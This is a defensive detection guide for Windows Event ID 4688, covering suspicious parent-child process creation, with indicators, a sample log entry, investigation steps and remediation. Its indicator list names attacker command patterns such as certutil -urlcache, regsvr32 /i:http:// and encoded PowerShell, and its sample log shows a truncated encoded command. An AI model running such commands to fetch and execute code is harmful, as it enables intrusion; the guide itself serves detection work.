EventPeeker
Analyze EVTX Logs Free →·Detection guides
Event ID 4688T1059high

Suspicious Process Creation — Abnormal Parent-Child Relationships

Event ID 4688 logs every process creation on Windows when process auditing is enabled. Attackers abuse this by launching malicious binaries from unexpected parent processes, unusual paths, or with encoded command lines — hiding attack activity among thousands of legitimate process events.

Severity

High

ATT&CK Tactic

Execution

Common attacker usage

Launching shells (cmd.exe, powershell.exe) from uncommon parents (Word, Excel, browsers, Java) · Executing LOLBins (certutil, mshta, regsvr32) with encoded payloads · Spawning processes from temp folders, AppData, or user-writable paths · Using renamed system binaries to avoid name-based detection · Injecting into legitimate processes to hide malicious activity

Investigate immediately if

  • !cmd.exe or PowerShell spawned by Microsoft Office, browser, or Java
  • !Process running from %TEMP%, %APPDATA%, or a user-writable path
  • !Command line contains Base64 strings, -EncodedCommand, or download cradles
  • !System binary (svchost, rundll32, regsvr32) running with unusual arguments
  • !Process with no command-line arguments or a blank process name

MITRE ATT&CK

Technique

T1059 · Command and Scripting Interpreter

Tactic

Execution

View on attack.mitre.org →

Security Relevance

Process creation monitoring is foundational to endpoint detection. Malware, ransomware loaders, and post-exploitation frameworks consistently leave traces in process creation logs — either through the binary path, the parent process, or the command-line arguments. Without process auditing enabled and 4688 events collected, an attacker can execute freely with limited forensic evidence.

Indicators of Malicious Use

  • Office or browser process spawning cmd.exe, powershell.exe, or wscript.exe
  • Process creation from %TEMP%, %APPDATA%\Roaming, or Downloads folder
  • -EncodedCommand, -enc, or IEX in command line arguments
  • certutil.exe -urlcache or -decode in command line
  • regsvr32.exe /s /u /i:http:// (Squiblydoo technique)
  • Process with a parent PID that is itself short-lived or already terminated

Example Log Entry

Log Name: Security
Source:    Microsoft-Windows-Security-Auditing
Event ID:  4688

A new process has been created.

Creator Subject:
  Account Name:  jsmith
  Account Domain: CORP

Process Information:
  New Process ID:   0x1b8c
  New Process Name: C:\Windows\System32\cmd.exe
  Token Elevation:  Limited

Creator Process Information:
  Creator Process Name: C:\Program Files\Microsoft Office\WINWORD.EXE
  Process Command Line: cmd.exe /c powershell -enc JABjACAAPQ...

Investigation Steps

  1. 1.Identify the parent process — Office, browser, or Java spawning a shell is almost always malicious.
  2. 2.Check the process path — legitimate Windows binaries live in System32 or SysWOW64, not in user profile folders.
  3. 3.Decode any Base64 command-line arguments (use CyberChef or PowerShell's [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...))).
  4. 4.Trace the process tree — follow the chain from the malicious process back to the initial access point.
  5. 5.Check network connections made by the process (correlate with firewall/proxy logs) — post-exploitation often phones home immediately after execution.
  6. 6.Look for associated 4663 (file access), 4698 (scheduled task), or 7045 (service install) events in the same session.
  7. 7.Capture the file hash and check against VirusTotal or your EDR's threat intel.

Check your own logs for this technique — upload an EVTX file for instant detection, no account required.

Upload EVTX →See sample

Common False Positives

  • Legitimate software update agents spawning cmd.exe or PowerShell
  • IT management tools (SCCM, PDQ, Ansible) running scripts via cmd.exe
  • Developer tools building or testing software from IDEs
  • Some installer packages spawn cmd.exe for post-installation steps

Remediation

  • Enable process creation auditing: Computer Configuration → Audit Policy → Detailed Tracking → Audit Process Creation.
  • Enable command-line auditing: Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events.
  • Isolate the affected host and capture a memory image before removing it from the network.
  • Review the user's recent activity (email, web browsing) to identify the initial access vector.
  • Block identified malicious hashes in your EDR and AV platforms.
  • Consider deploying Attack Surface Reduction (ASR) rules to block Office from spawning child processes.

Related Event IDs

4689Process terminated — pair with 4688 to track process lifetime
4663Object access — file access by the suspicious process
4698Scheduled task created — process may install persistence
4104PowerShell script block logging — content of any scripts executed

Related Detection Guides

PowerShell AbuseLiving off the Land (LOLBins)Lateral MovementRansomware IndicatorsEvent ID 4104 — PowerShell Script Block Logging

Analyze your Windows Event Logs

Upload an .evtx file from servers, domain controllers, or endpoints — get instant detections, MITRE mappings, and an AI-generated triage report.

Detect this technique in your logs →
← All detection guides·Analyze EVTX Logs Free →